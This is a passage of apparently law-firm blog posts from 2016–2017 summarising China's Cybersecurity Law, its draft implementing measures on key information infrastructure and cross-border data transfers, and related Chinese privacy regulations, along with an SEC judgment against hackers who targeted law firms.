Though reportedly the first enforcement actions brought pursuant to the new Cybersecurity Law, these amounted to only minor actions. They involved only warnings and orders to correct the issues; no fines or criminal penalties were imposed. Accordingly, these enforcement actions likely do not provide much insight into how the Cybersecurity Law will be enforced moving forward. These actions do, however, indicate that enforcement authorities, such as public security agencies and the cyberspace administration agency, have started to consider their roles in enforcing the Cybersecurity Law. More enforcement actions could be expected in future.

China Publishes Draft Regulations on Protecting the Security of Key Information Infrastructure

This post has been updated. 

On July 10, 2017, the Cyberspace Administration of China published a new draft of its Regulations on Protecting the Security of Key Information Infrastructure (the “Draft Regulations”), and invited comment from the general public. The Cybersecurity Law of China establishes a new category of information infrastructure, called “key [or critical] information infrastructure,” and imposes certain cybersecurity obligations on enterprises that operate such infrastructure. The Draft Regulations will remain open for comment through August 10, 2017.

The Draft Regulations provide further details on the scope of what will constitute “key information infrastructure.” According to the Draft Regulations, this may include network facilities and information systems operated and managed by (1) government agencies and entities in the energy, finance, transportation, water conservation, health care, education, social insurance, environmental protection and public utilities sectors; (2) information networks, such as telecommunications networks, broadcast television networks and the Internet, and entities providing cloud computing, big data and other large-scale public information network services; (3) research and manufacturing entities in industry sectors such as science and technology for national defense, large equipment manufacturing and the chemical industry and food and drug sectors; and (4) news organizations, such as broadcasting stations, television stations and news agencies. To be counted as “key information infrastructure,” however, the infrastructure must still meet the criterion that severe endangerment of national security, the national economy and the people’s livelihood and the public interest would result if the infrastructure suffers destruction, loss of functionality or leakage of data. The Cyberspace Administration of China will work together with relevant government agencies to formulate materials for the identification of “key information infrastructure” in their respective industry sectors and fields.

The Draft Regulations reiterate the cybersecurity compliance obligations originally imposed under the Cybersecurity Law, such as obligations to formulate internal security management systems and operating protocols; to adopt technological measures to prevent against computer viruses and attacks and intrusions on networks; to monitor and record network operations and cybersecurity incidents; and to adopt security measures such as data classification, back-up and encryption of important data. At the same time, the Draft Regulations impose further cybersecurity obligations on operators of key information infrastructure, including obligations to: (1) designate a specific cybersecurity administrative department and persons responsible for cybersecurity, and conduct background reviews of these responsible persons; (2) conduct cybersecurity education, technology training and evaluation of the skills of relevant staff on a regular basis; (3) implement disaster recovery backup for important systems and databases, and adopt remedial measures to promptly address security risks such as system vulnerabilities; and (4) establish contingency plans for cybersecurity incidents and conduct regular rehearsals of these plans.

According to the Draft Regulations, operators of key information infrastructure should establish a system to inspect their key information infrastructure and evaluate its security aspects and possible risks. They may conduct this inspection and evaluation on their own behalf, or engage third-party cybersecurity service providers. They must conduct this inspection and evaluation at least once a year.

The Draft Regulations reiterate the original data localization requirements on the operators of key information infrastructure under the Cybersecurity Law, as well as related requirements under the Measures for Security Reviews of Network Products and Services. The Draft Regulations also require that the operation and maintenance of key information infrastructure should be performed within the territory of China. If overseas long-distance maintenance of key information infrastructure is truly necessary for business reasons, the operator should report in advance to both the relevant government agency that has the authority over the industry sector and the public security department.

View our English translation of the Draft Regulation.

China Releases Draft Guidelines on Cross-Border Data Transfers Pursuant to the Cybersecurity Law

On May 27, 2017, the National Information Security Standardization Technical Committee of China published draft guidelines on cross-border transfers pursuant to the new Cybersecurity Law, entitled Information Security Technology – Guidelines for Data Cross-Border Transfer Security Assessment (the “Draft Guidelines”). The earlier draft, Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft Measures”), requires network operators to conduct “security assessments” when they propose to transfer personal information and “important information” to places outside of China. These “security assessments” are essentially audits of the cybersecurity circumstances surrounding the proposed transfer that are intended to produce an assessment of the risk involved. If the assessment indicates that the risk is too high, the transfer must be terminated.

The Draft Guidelines, once finalized, are intended to establish norms for working requirements, methodology, content and the determination of conclusions for these “security assessments.” They recommend particular content for consideration during “security assessments,” such as the volume of information to be transferred, the political and legal environment in the place where the data recipient is located, and the security safeguard capabilities of both the transferor and the data recipient. At this time, the following observations can be made:

  • Very generally speaking, the Draft Measures appear to take a risk-based approach, meaning that an assessment of the overall risks associated with a cross-border transfer, and the likely outcomes thereof, rather than a formalistic “check the box” compliance approach, should be used to determine whether the transfer should proceed.
  • The Draft Guidelines appear intended, once finalized, to be a voluntary rather than compulsory document.
  • The “security assessments” would focus on two overall inquiries: (1) the legality and appropriateness of the proposed cross-border transfer, and (2) the controllability of the risks involved.
  • In addition to personal information, the Draft Measures would also impose restrictions on the cross-border transfer of “important information.” The Draft Measures define this term broadly as “information which is very closely related to national security, economic development and the societal and public interests.” The Draft Guidelines provide some specific possible examples of what might constitute “important information.”
  • The Draft Guidelines would introduce into the Cybersecurity Law’s implementation framework the concept of “sensitive personal information,” as well as the possibility of desensitizing this information using processing that removes or reduces the sensitive elements in the data.

The Draft Guidelines’ content and approach may change by the time they are finalized. The Draft Guidelines are open to comment from the general public until June 26, 2017.

Cybersecurity Law Goes Into Effect in China

On June 1, 2017, the new Cybersecurity Law went into effect in China. This post takes stock of (1) which measures have been passed so far, (2) which ones go into effect on June 1 and (3) which ones are in progress but have yet to be promulgated.

A draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information have been circulated, but at this time only the Cybersecurity Law itself and a relatively specific regulation (applicable to certain products and services used in network and information systems in relation to national security) have been finalized. As such, only the provisions of the Cybersecurity Law itself and this relatively specific regulation went into effect on June 1.

On June 1, 2017, the following obligations (among others) become legally mandatory for “network operators” and “providers of network products and services”:

  • personal information protection obligations, including notice and consent requirements;
  • for “network operators,” obligations to implement cybersecurity practices, such as designating personnel to be responsible for cybersecurity, and adopting contingency plans for cybersecurity incidents; and
  • for “providers of network products and services,” obligations to provide security maintenance for their products or services and to adopt remedial measures in case of safety defects in their products or services.

Penalties for violating the Cybersecurity Law can vary according to the specific violation, but typically includes (1) a warning, an order to correct the violation, confiscation of illegal proceeds and/or a fine (typically ranging up to RMB 1 million); (2) personal fines for directly responsible persons (typically ranging up to RMB 100,000); and (3) in particularly serious circumstances, suspensions or shutdowns of offending websites and businesses, including revocations of operating permits and business licenses.

A final version of the draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information are forthcoming. When issued, they are expected to finalize and clarify the following prospective obligations:

  • restrictions on cross-border transfers of personal information (and “important information”), including a notice and consent obligation specific to cross-border transfers; and
  • procedures and standards for “security assessments,” which validate the continuation of cross-border transfers of personal information and “important information.”

The draft version of the implementing regulation on the treatment of cross-border transfers of personal information contains a grace period, under which “network operators” would not be required to comply with the cross-border transfer requirements until December 31, 2018. The final draft likely will contain a similar grace period.

China Releases Revised Draft on Measures for Implementation of the New Cybersecurity Law

On May 19, 2017, the Cyberspace Administration of China (“CAC”) issued a revised draft (the “Revised Draft”) of its Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data. The original draft was issued in April 2017, and similar to the original draft, the Revised Draft does not have the impact of law; it does, however, provide an indication of how the CAC’s views on the Cybersecurity Law have evolved since the publication of the original draft. The Revised Draft was issued after the CAC received comments on the original draft from numerous parties.

The principal issues and challenges presented in the original draft remain largely the same in the Revised Draft, although certain issues have been clarified. Below are some key issues addressed in the Revised Draft:

  • The Revised Draft maintains the original draft’s restrictions on cross-border transfers of personal data, and applies the restrictions to “network operators.” Prior to conducting cross-border transfers, “network operators” are required to notify data subjects and obtain their consent.
  • Data subject consent to a cross-border transfer will not be required during emergencies (i.e., when the life or property of a data subject is in danger).
  • The data subject’s consent can be established in implied form by way of an affirmative act by the data subject.
  • The Revised Draft maintains the original draft’s requirement to conduct a “security assessment” on all cross-border transfers of personal data. Large-scale transfers, or transfers involving relatively sensitive information, must be conducted before a regulatory authority. The original draft defined large-scale transfers as those involving personal data of more than 500,000 individuals or involving files larger than 1,000 GB; the Revised Draft’s definition no longer includes files larger than 1,000 GB.
  • The definition of “network operator” remains very broad under the Revised Draft, and may apply to practically any material enterprise.
  • The Revised Draft is stated to go into effect together with the Cybersecurity Law itself on June 1, 2017. However, the Revised Draft also contains a grace period for the cross-border transfer restriction. Under that grace period, “network operators” will only have to comply with the requirements on cross-border transfers beginning on December 31, 2018.

Chinese Hackers Fined for Hack of New York Law Firms

On May 5, 2017, the U.S. District Court for the Southern District of New York entered a default judgment in favor of the SEC against three Chinese defendants accused of hacking into the nonpublic networks of two New York-headquartered law firms and stealing confidential information regarding several publicly traded companies engaged in mergers and acquisitions. The defendants allegedly profited illegally by trading the stolen nonpublic information. After the defendants failed to answer the SEC’s complaint, the court entered a default judgment against them, imposing a fine of approximately $8.9 million against the defendants (three times the profits they gained by the unlawful trading, the maximum penalty allowable under the relevant section of the Securities Exchange Act of 1934).

China Publishes Final Measures for Security Reviews of Network Products and Services

On May 2, 2017, the Cyberspace Administration of China published the final version of the Measures for the Security Review of Network Products and Services (for trial implementation) (the “Measures”), after having published a draft for public comment in February. Pursuant to the Cybersecurity Law of China (the “Cybersecurity Law”), if an operator of key information infrastructure purchases a network product or service that may affect national security, a security review of that product or service is required. The Measures provide detailed information about how these security reviews will actually be implemented. The Measures will come into effect on June 1, 2017, together with the Cybersecurity Law. The Measures should not be confused with the final version of the draft Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data, which was published on April 11, 2017, and remain open for public comment.

Pursuant to the Measures, critical network products and services used in network and information systems relating to national security are subject to a network security review. Any network product or service purchased by operators of key information infrastructure will also be subject to a network security review, if such product or service might affect national security.

The Measures require that the security assessments focus on verifying that the products or services are “secure and controllable.” The Measures do not provide the precise requirements for finding that a product or service is “secure and controllable,” but indicate that the process for determining whether a product or service is “secure and controllable” will take the form of a risk assessment, which will focus on the following risks: (1) the risk in the product or service itself, and the risk that the product or service may be illegally controlled, interfered with or suspended; (2) the supply chain risks arising during the manufacturing, testing, delivery and technical support of the product or service; (3) the risk that the provider of the product or service may use it to illegally collect, store, process or use its users’ personal information; (4) the risk that the provider of the product or service may jeopardize cybersecurity or infringe upon the interests of users, by taking advantage of their reliance on the product or service; and (5) any other risks that may jeopardize national security.

The Cyberspace Administration of China will establish a network security review commission which will cooperate with experts and third-party institutions to evaluate the foregoing risks.

China Publishes Draft Measures for Security Assessments of Data Transfers

The Cybersecurity Law of China, which was passed in November of 2016, introduced a data localization requirement requiring “operators of key information infrastructure” to retain, within China, critical data and personal information which they collect or generate in the course of operating their business in China. If an entity has a genuine need resulting from a business necessity to transmit critical data or personal information to a destination outside of China, it can do so provided it undergoes a “security assessment.”

On April 11, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft”). The Draft provides further guidance on how the security assessments might be carried out. The general public may comment on the Draft until May 11, 2017. At this point, the Draft has only been published for comment and does not constitute a final regulation. However, it represents a real possibility of what the final regulation could require.

The Draft would extend the data localization requirement from “operators of key information infrastructure” to all “network operators.” The definition of “network operator” under the Draft remains consistent with the definition given under the Cybersecurity Law, which refers to an owner or an administrator of a computerized information network system, or a network service provider. This means that all  “network operators” will also be required to store, within the territory of China, personal information and critical data which they collect or generate in the course of operating their business in China and undergo a security assessment if they have a business need to transmit data outside of China.

The Draft has divided the security assessment into two types, self-assessments and assessments conducted by the competent authority. In general, a “network operator” has to conduct a self-assessment before transmitting critical data or personal information abroad, and will remain responsible for the result of its assessment. However, a security assessment must be submitted to and conducted by the competent authority under the following circumstances: (1) the outbound data transfer involves the personal information of over 500,000 individuals; (2) the data size is over 1,000 GB; (3) the transfer involves data in relation to nuclear facilities, chemistry and biology, national defense and the military, population health, megaprojects, the marine environment or sensitive geographic information; (4) the transfer involves data relating to information about the cybersecurity of key information infrastructure, such as system vulnerabilities and security protection; (5) the outbound transfer of personal information and critical data is conducted by an operator of key information infrastructure; or (6) the outbound data transfer may affect the national security or the public interest.

“Personal information” is already defined in the Cybersecurity Law itself as information that is recorded by electronic or other methods and that can, on its own or in combination with other information, distinguish the identity of a natural person. “Critical data” is defined in the Draft as data which is very closely related to national security, economic development and the social and public interests, but the concrete scope is to be further elaborated upon in relevant national standards and separate guidance documents.

Under the Draft, a security assessment would focus on the following factors: (1) the necessity of the outbound transfer; (2) the quantity, scope, type and sensitivity of the personal information and critical data to be transferred; (3) the security measures and capabilities of the data recipient, as well as the cybersecurity environment of the nation where the data recipient is resident; (4) the risk of leakage, damage or abuse of the data after the outbound transfer; and (5) possible risks to the national security, public interests and individual’s legal rights that are involved in the outbound data transfer and data aggregation.

When transferring personal information, network operators are required to expressly explain to the data subject the purpose, scope, content, recipient and the nation where the recipient is resident, and obtain the consent of the data subject. An outbound data transfer is prohibited without the consent of a data subject, or when the transfer may infringe upon the interests of the individual. Outbound transfers of a minor’s personal information must be consented to by the minor’s guardian.

An outbound data transfer will also be prohibited if the transfer would bring risks to the security of the national political system, economy, science and technology or national defense, or if the transfer could affect national security or jeopardize the public interest.

China Publishes Draft Measures for Security Review of Network Products and Services

On February 4, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Review of Network Products and Services (the “Draft”). Under the Cybersecurity Law of China, if an operator of key information infrastructure purchases network products and services that may affect national security, a security review is required. The Draft provides further hints of how these security reviews may actually be carried out, and is open for comment until March 4, 2017.

According to the Draft, any critical network products and services used in information systems or purchased by operators of key information infrastructure that may affect national security and the public interest are subject to a network security review.

The Draft would establish a potentially significant standard that would be commonly applied in security assessments performed under the Cybersecurity Law. These security assessments would focus on verifying that products or services are “secure and controllable.” The concept of “security and controllability” has appeared before, both in the State Security Law of China and in guidelines for the banking and telecommunications sectors, but here it is being applied in the context of the new Cybersecurity Law.

It remains to be seen how this term would be interpreted in the context of the new Cybersecurity Law. The exact requirements to determine if a product or service is “secure and controllable” are still not provided in the Draft, and even after being established, may evolve over time. However, under the Draft, the process of determining whether a product or service is “secure and controllable” would take the form of a risk assessment, under which the following risks would be principally analyzed: (1) the risk that the product or service may be illegally controlled, interfered with or suspended, (2) the risks arising during development, delivery and technical support of the product or service, (3) the risk that the provider of the product or service may use it to illegally collect, store, process or use the personal information of its users, (4) the risk that the provider of the product or service may engage in unfair competition or infringe upon the interests of users, by taking advantage of their reliance on the product or service and (5) any other risks that may jeopardize national security or the public interest.

The Cyberspace Administration of China will establish a network security review commission, which will cooperate with third-party institutions to evaluate these risks.

South Korea Seeks to Join APEC Cross-Border Privacy Rules

On January 17, 2017, the International Trade Administration (“ITA”) announced that South Korea formally submitted its intent to join the APEC Cross-Border Privacy Rules (“CBPR”) system. South Korea would be the fifth APEC economy to join the system, joining the United States, Mexico, Canada and Japan.

The APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. According to the ITA, there is growing international recognition that the CBPR system is “a mechanism to build confidence for consumers, businesses, and regulators in regional privacy practices,” as well as “a template for creating a global solution to data transfer restrictions.”

South Korea’s statement of intent to join the CBPR system follows on the heels of Chinese Taipei’s recent announcement that it intends to join the system in the near future, as well as recent indications that other APEC economies are considering or working towards joining the system.

Draft of E-Commerce Law Published for Comment in China

Last month, the Standing Committee of the National People’s Congress of China published a full draft of the E-commerce Law (the “Draft”) and is giving the general public an opportunity to comment on the draft through January 26, 2017.

The Draft applies to (1) e-commerce activities within China or (2) e-commerce activities involving either domestic enterprises that operate an e-commerce business or customers located in China. In particular, the Draft provides specific protections for “personal information” of e-commerce users, defined as information which can be used, separately or in combination with other information, to identify a specific user. The Draft provides specific examples, including the user’s name, identity certificate number, address, contact information, location, bank card information, transaction records and payment records, as well as express logistics records.

The Draft reiterates that enterprises operating an e-commerce business (“e-commerce enterprises”), which include e-commerce third-party platforms and e-commerce operators, are required to (1) follow the principles of legitimacy, rightfulness and necessity, (2) publish their rules on the collection, processing and use of personal information in advance and (3) obtain the consent of their users to those rules. The Draft does not provide any guidance on the form or manner in which consent must be obtained. The Draft also prohibits e-commerce enterprises from forcing users to consent to their collection, processing and use of personal information by threatening to cease the provision of services.

The processing and use of personal information by e-commerce enterprises must comply with the enterprise’s published rules on processing as agreed upon with its users. In addition, when amending its rules on information processing, an e-commerce enterprise must again obtain the consent of the users. If the users disagree with the amendments, the enterprise is required to provide appropriate relief. In instances where the enterprise proposes changes to its rules directed at the purpose, method or scope of the processing previously agreed upon with its users, the enterprise is required to inform the user and obtain the user’s express consent.

Before they may exchange and share data and information related to e-commerce, e-commerce enterprises are first required to irreversibly de-personalize the data and information in such a way that it can no longer be used to identify a specific individual (or an associated computer terminal). Additionally, in instances where the processing or use of personal information by an e-commerce enterprise might infringe upon the legitimate rights and interests of a user, the user has the right to request that the e-commerce operating entity cease the infringement. Further, upon expiration of a statutory or agreed-upon retention period, an e-commerce enterprise is required to cease its processing and use of relevant personal information, or delete or destroy such information.

According to the Draft, users also have the right to access their personal information. After receiving an access request from a user, the enterprise must promptly provide the relevant information after verifying the user’s identity. Similarly, in cases where a user requests the correction of any incorrect information, the enterprise is required to make the changes in a timely manner.

The Draft also includes provisions governing data breaches. In the case of an occurrence or possibility of leakage, loss or damage of personal information, the e-commerce enterprise must immediately take remedial measures, promptly notify the users and submit a report to the relevant authorities.

The personal information protection requirements laid out in the Draft are generally consistent with those that appear in the new Chinese Cybersecurity Law, and in a number of prior regulations, including those governing internet information service providers. It is possible that this may be a pattern that is taking hold among rules governing the processing of personal information in China.

China Publishes Regulations Regarding Cloud Services for Public Comment

Recently, the Ministry of Industry and Information Technology of the People’s Republic of China published a draft of the new Notice on Regulating Business Behaviors in the Cloud Service Market (Draft for Public Comments) (the “Draft”) for public comment. The Draft is open for comment until December 24, 2016.

Under the Draft, foreign investors investing in and operating cloud services within China must establish a foreign-invested telecommunications enterprise and obtain a value-added telecommunications business license. In addition, the Draft provides that when establishing technical cooperation with other entities, a cloud service operator must not lease out or transfer its telecommunication business license by any method to its partners, or provide resources, premises or facilities to its partners to facilitate illegal operations. The Draft also prohibits cloud service operators from using dedicated lines or VPNs to connect to an international network.

In addition, the Draft applies certain requirements to cloud service providers which were already applicable to Internet service providers, including that cloud service providers must establish and publish rules regarding their collection and use of personal information, and adopt security safeguards for network data and users’ personal information. In addition, upon a user’s termination of services, cloud service operators are required to cease their collection and use of the user’s personal information. Also, when establishing technical cooperation with other entities, a cloud service operator may not provide users’ personal information or network data to its partners in violation of law.

The Draft also provides that when providing services to residents of China, cloud service operators must host their service facilities and retain network data within the territory of China, and cross-border data transfers must proceed in compliance with relevant regulations. In the event of an information leakage, cloud service operators must promptly inform the users of the leakage, adopt effective remedial measures and report the incident to the administrative authority for the telecommunications sector.

The Draft is not yet in final form and there remains a possibility that the final version may differ substantially from the Draft. No time frame has been announced for the adoption of a final version.

 

Final Cybersecurity Law Enacted in China

On November 7, 2016, the Standing Committee of the National People’s Congress of China enacted the final Cybersecurity Law after it held its third reading of the draft Cybersecurity Law on October 31, 2016. The first draft of the Cybersecurity Law was published for comment more than a year ago, followed by the second draft in July this year. The final Cybersecurity Law will apply from June 1, 2017.

Under the Cybersecurity Law, the term “key information infrastructure” generally refers to information infrastructure maintained by certain industry sectors which would seriously jeopardize national security and the public interest should such infrastructures malfunction, or be subject to damage or data leakages. The relevant industry sectors include public communication and information services, energy, transportation, water resources utilization, finance, public service and e-government affairs. The State Council will formulate the specific scope of “key information infrastructure” and the mandatory security protection measures that organizations that operate “key information infrastructure” will need to apply.

Operators of key information infrastructure are subject to a data localization requirement, under which they must retain, within the territory of China, critical and personal information which they collect and produce during their operations in China. They may still be able to transmit this information overseas, but only after undergoing and passing a security review. In addition, when operators of key information infrastructure procure network products or services that may affect national security, a national security inspection is required. Operators of key information infrastructure are also required to undergo a network safety assessment at least once a year.

With respect to the collection and use of personal information, the Cybersecurity Law reiterates the requirements of notice and consent and the principles of legitimacy, rightfulness and necessity. Network operators are prohibited from providing a data subject’s personal information to third parties without the data subject’s consent, except in cases where the personal information is irreversibly depersonalized such that the data does not identify particular individuals.

In addition, a data subject can request a network operator to delete their personal information if he or she discovers that its collection or use is in violation of the law or of a contract between the parties. A data subject can also request a network operator to correct any personal information that is inaccurate.

According to the Cybersecurity Law, network operators must provide technical support and assistance to public or national security agencies when conducting an investigation of a crime. Network operators are required to adopt technical measures to monitor and record their network operations, and to preserve related web logs for at least 6 months. Overseas entities or individuals that attack, invade, interfere with or destroy “key information infrastructure” in China will be subject to legal liability, and public security agencies in China may adopt sanctions against them, including freezing their assets.

The Cybersecurity Law also includes provisions regarding the punishment of cyber crimes, including cyber fraud and the online protection of minors.

China’s Cybersecurity Law Undergoes Third Reading

On October 31, 2016, the Standing Committee of the National People’s Congress of China held a third reading of the draft Cybersecurity Law (the “third draft”). As we previously reported, the second draft of the Cybersecurity Law was published for comment in June. The National People’s Congress has not yet published the full text of the third draft of the Cybersecurity Law.

According to the National People’s Congress of China’s website, under the third draft of the Cybersecurity Law, the term “key information infrastructures” generally refers to information infrastructures maintained by certain industry sectors which would seriously jeopardize national security and the public interest should such infrastructures malfunction, or be subject to damage or data leakages. The relevant industry sectors include public communication and information services, energy, transportation, water resources utilization, finance, public service and e-government affairs. Operators of such infrastructures would be subject to a prospective data localization requirement, and would be required to implement certain security protection measures. The State Council will formulate the specific scope of “key information infrastructures” and the required security protection measures.

The third draft also stipulates that overseas entities or individuals that attack, invade, interfere with or destroy Chinese “key information infrastructures” will be subject to legal liability, and China’s public security agencies may adopt sanctions against them, including freezing their assets.

In addition, the third draft includes provisions regarding the punishment of cybercrimes, including cyber fraud, and the online protection of minors.

Regulation on the Online Protection of Minors Published for Comment in China

Recently, the Cyberspace Administration of China published for public comment a draft of the Regulations on the Online Protection of Minors (“Draft Regulations”). The Draft Regulations are open for comment until October 31, 2016.

The Draft Regulations stipulate certain requirements are applicable to the online collection and use of personal information of minors. Under the Draft Regulations, any entity that collects or uses personal information of minors via the Internet must place a warning label at an easily visible position, stating the source, content and purpose of the collection of the information. That entity must then obtain the consent of the minors, or of their guardians. These entities are required to adopt specific rules for the collection and use to strengthen the online protection of personal information of minors.

If a minor, or his or her guardian, requests an Internet information service provider to delete or block the minor’s personal information, the Internet information service provider must abide by the request.

The Draft Regulations also stipulate that Internet information service providers who provide online gaming services must require online gamers to provide authentic identity information when registering. The cybersecurity authority will establish a blacklist of entities that have failed to protect the personal information of minors online.

Under the Draft Regulations, “personal information of minors” refers to all information that is recorded, whether electronically or otherwise, and can be used to identify a minor, whether individually or in combination with other information. The term includes name, location, address, date of birth, contact information, account name, identity card number, personal biological identification information and portrait, etc., of a minor.

An entity that violates the requirements in the Draft Regulations that apply to the collection and use of personal information of minors may face administrative penalties, including a warning and a requirement to effect a correction, a fine of up to RMB 500,000 and an order to suspend or stop the provision of relevant services.

China Enacts E-Hailing Regulation to Protect Driver and Passenger Data

Last month, the People’s Republic of China’s Ministry of Transportation, Ministry of Industry and Information Technology and six other administrative departments jointly published the Interim Measures for the Administration of Operation and Services of E-hailing Taxis (the “Measures”). E-hailing is an increasingly popular business in China and has already become a compelling alternative to the traditional taxi. The Measures seek to regulate this emerging industry, and will come into effect on November 1, 2016. Below is a summary of the key requirements.

The Measures contain a data localization requirement under which operators of e-hailing platforms will be required to locate their servers within mainland China. In addition, personal information collected on e-hailing platforms and business data generated during their operations must be stored and used within mainland China, and such information and data must be retained for at least two years.

The Measures also require operators of e-hailing platforms to expressly disclose the purpose, method and scope of the collection and use of the personal information of drivers and passengers while on the platforms. Operators of e-hailing platforms will be required to follow the principle of necessity when they collect personal information of drivers and passengers and may not use such personal information for other businesses without the consent of the data subjects.

Under the Measures, operators of e-hailing platforms must not, except for purposes of cooperating with supervisory authorities or with criminal investigations, provide the personal information of drivers and passengers (such as names, contact information, home addresses, bank or payment accounts, geographical location or travel routes) to any third parties. They are also prohibited from disclosing sensitive information relating to national security, such as geographical coordinates and symbols.

The Measures also require operators of e-hailing platforms to adopt systems for the administration of cybersecurity and technical security measures. In the event of an information leakage, operators of e-hailing platforms must report to the relevant competent authority without delay and take timely and effective remedial measures.

E-hailing platform operators that illegally use or disclose passengers’ personal information may face a penalty of RMB 2,000 to RMB 10,000. They may also be subject to civil liability for compensation and criminal sanctions.

China Publishes Regulation on the Use of Resident Identity Cards

Recently, the People’s Republic of China’s Ministry of Public Security, the National Development and Reform Commission and six other administrative departments jointly published the Announcement on Regulating the Administration of the Use of Resident Identity Cards (the “Announcement”). The Announcement came into effect on July 15, 2016, the date of its issuance.

The Announcement reiterates existing prohibitions against leasing, lending or assigning a resident identity card to another person, and reiterates an existing requirement that resident identity cards must not be seized or held as a security by government agencies, related entities or their staff.

According to the Announcement, when performing their duties or providing services, personnel of government agencies and related entities must not arbitrarily record the personal information of citizens that appears on their resident identity cards. Additionally, government agencies, related entities or their personnel cannot arbitrarily copy or scan identity cards of residents. The Announcement encourages citizens to resist unauthorized copying, scanning or seizure of their resident identity cards.

Government agencies and related entities are required to establish administrative systems for the security of personal information and develop those systems to their fullest extent, adopt internal storage systems for personal information that use strict access authorization procedures and strengthen their security measures to avoid the leakage or theft of information.

Government agencies and related entities are also required to establish a “blacklist” of individuals having a history of using the resident identity cards of other persons as their own, and to adopt information sharing mechanisms.

China’s State Administration for Industry and Commerce Publishes Draft Regulations on the Protection of Consumer Rights

The State Administration for Industry and Commerce of the People’s Republic of China published a draft of its Implementing Regulations for the P.R.C. Law on the Protection of the Rights and Interests of Consumers (the “Draft”) for public comment. The draft is open for comment until September 5, 2016.

The Draft reiterates the requirements under the law that business operators must follow the principles of legitimacy, rightfulness and necessity when they collect and use the personal information of consumers. They also must expressly state the purposes, methods and scope of their collection and use of the information, and obtain the consent of the consumers. It also provides that business operators may not collect information that is irrelevant to their operations, or collect information in an improper way. Under the Draft, a business operator is required to retain, for at least five years, supporting documentation that can demonstrate its performance of its obligation to expressly inform and obtain the consent of consumers.

Business operators are required to adopt information security systems to ensure the security of the personal information of consumers. Business operators are required not to provide consumers’ personal information to other parties without the consumers’ consent, except in cases where the consumers’ personal information is anonymized in such a way that it cannot identify the specific individual and that the anonymization cannot be reversed.

In the event that a business operator suffers an information security breach which results in the disclosure or loss of information, or anticipates that such a breach is likely, the business operator is required to adopt remedial measures and promptly inform the affected consumers of such breach.

Compared with the original definition of “consumers’ personal information” in the earlier Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers, the scope of the term “consumers’ personal information” under the Draft additionally includes biometric features.

According to the Draft, without consumers’ express consent or request, business operators may not send them commercial electronic messages or make commercial marketing calls. Business operators also may not cause consumers to bear the costs of sending commercial electronic messages or making commercial marketing calls, unless otherwise agreed by the parties.

Second Draft of the Cybersecurity Law Published for Comment in China

On July 5, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China (the “Standing Committee”) published the full second draft of the Cybersecurity Law (the “second draft”). The publication of the second draft comes after the Standing Committee’s second reading of the draft on June 27, 2016. The public may comment on the second draft of the Cybersecurity Law until August 4, 2016.

The second draft reiterates that network operators should conform to the principles of legality, justice and necessity when collecting personal information, and should expressly inform the data subject of the purpose, method and scope for their collection and use of the information. The second draft also stipulates that network operators are prohibited from providing a user’s personal information to third parties without the user’s consent, except where the personal information is depersonalized in such a way that it cannot identify the individual and the depersonalization cannot be reversed.

The definition of “key information infrastructure” remains unclear in the second draft. According to the second draft, “key information infrastructure” refers to information infrastructure of which damage, malfunction or data leakage would seriously jeopardize national security and the public interest. The State Council will formulate the specific scope of key information infrastructure and the security protection measures for key information infrastructure. Read more information about the second draft.

China Publishes First Regulation Expressly Regulating Mobile Apps

On June 28, 2016, the State Internet Information Office of the People’s Republic of China published the Administrative Provisions on Information Services for Mobile Internet Applications (the “App Administrative Provisions”). This is the first regulation that expressly regulates mobile apps in the People’s Republic of China. Before the App Administrative Provisions were published, the P.R.C. Ministry of Industry and Information Technology had published a draft of the Interim Provisions on the Preinstallation and Management of the Distribution of Mobile Intelligent Terminal Applications (“Interim Provisions”). The comment period for the Interim Provisions draft expired six months ago and i’s still uncertain when it will become effective. According to unofficial statistics, domestic app stores have more than 4 million apps in inventory presently, and the number is growing. Those apps will now become highly regulated products under the App Administrative Provisions.

Most importantly, the App Administrative Provisions expressly requires app providers who provide information services via apps to obtain relevant licenses. Currently, numerous app providers conduct information service businesses without having any license to do so, due to the lack of express laws in this area. With the issuance of the App Administrative Provisions, these app providers will now have to apply for and obtain the relevant licenses, which can include ICP, Internet Culture Operation and/or Internet Publishing Licenses.

Also, according to the App Administrative Provisions, app providers now have obligations relating to information security. For example, app providers are now required to conduct an authentication of the identity of their registered users according to a principle summarized as “real name authentication at the back end, voluntary authentication at the front end.” Also, without the users’ consent, an app provider is required not to collect or use personal information or operate functions which are closely related to the personal information of its users, such as location, contacts and camera. App providers also are required not to produce or publish apps that infringe upon the intellectual property of third parties, and are required to maintain the log-in information of the users of its app on file for 60-days.

Internet Application Store Service Providers (“IASS Providers”) are required to supervise the performance by app providers of their obligations. For example, an IASS Provider is required to file required information about app providers with branches of the governmental Internet Information Offices at the provincial level, and to supervise the app providers’ performance of their obligations. If any app provider violates its obligations, the IASS Provider is required to adopt relevant remedial measures, and file a report with the relevant government agencies.

Second Reading of China’s Draft of Cybersecurity Law

On June 27, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China held a second reading of the draft Cybersecurity Law (the “second draft”). The law is aimed at strengthening the protection and security of key information infrastructure and important data in China. As we previously reported, the first draft of the Cybersecurity Law was published for comment almost a year ago, but the National People’s Congress has not published the full second draft of the Cybersecurity Law to date.

According to the website of the National People’s Congress, the second draft of the Cybersecurity Law stipulates that the State will adopt priority protection over key information infrastructure that would seriously jeopardize national security and the public interest if data was damaged or leaked.

The second draft also reiterates the requirement that key information infrastructure operators should store, within the territory of China, personal information and other important business data collected and produced during operations. If it is necessary to transfer such information and data to overseas individuals or organizations for business requirements, a security assessment should be conducted.

The second draft has a new provision requiring that information collected by competent government authorities during their protection of key information infrastructure be used only for the protection of network security. The second draft additionally states that big data applications must anonymize personal information, and that the State will support research on protecting data and promoting security.

